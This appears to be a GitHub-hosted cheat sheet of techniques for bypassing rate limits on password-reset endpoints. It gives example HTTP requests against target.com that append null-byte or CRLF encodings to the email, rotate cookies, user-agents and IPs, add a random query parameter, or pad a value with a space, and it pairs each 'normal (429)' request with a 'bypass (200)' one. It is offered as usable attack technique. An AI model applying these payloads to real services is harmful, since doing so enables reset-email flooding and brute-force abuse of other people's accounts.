You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Adding Null Byte %00 or CRLF %09, %0d, %0a at the end of the Email can bypass rate limit
POST /ForgotPass.php HTTP/1.1
Host: target.com
...
[email protected]%00
Try changing user-agents, cookies and IP address
# Normal Request (429)
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
...
[email protected]# Try this to bypass (200)
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
...
[email protected]
Add a random parameter on the last endpoint
# Normal Request (429)
POST /ForgotPass.php HTTP/1.1
Host: target.com
...
[email protected]# Try this to bypass (200)
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
...
[email protected]
Add space after the parameter value
# Normal Request (429)
POST /api/forgotpass HTTP/1.1
Host: target.com
...
{"email":"[email protected]"}
# Try this to bypass (200)
POST /api/forgotpass HTTP/1.1
Host: target.com
...
{"email":"[email protected]"}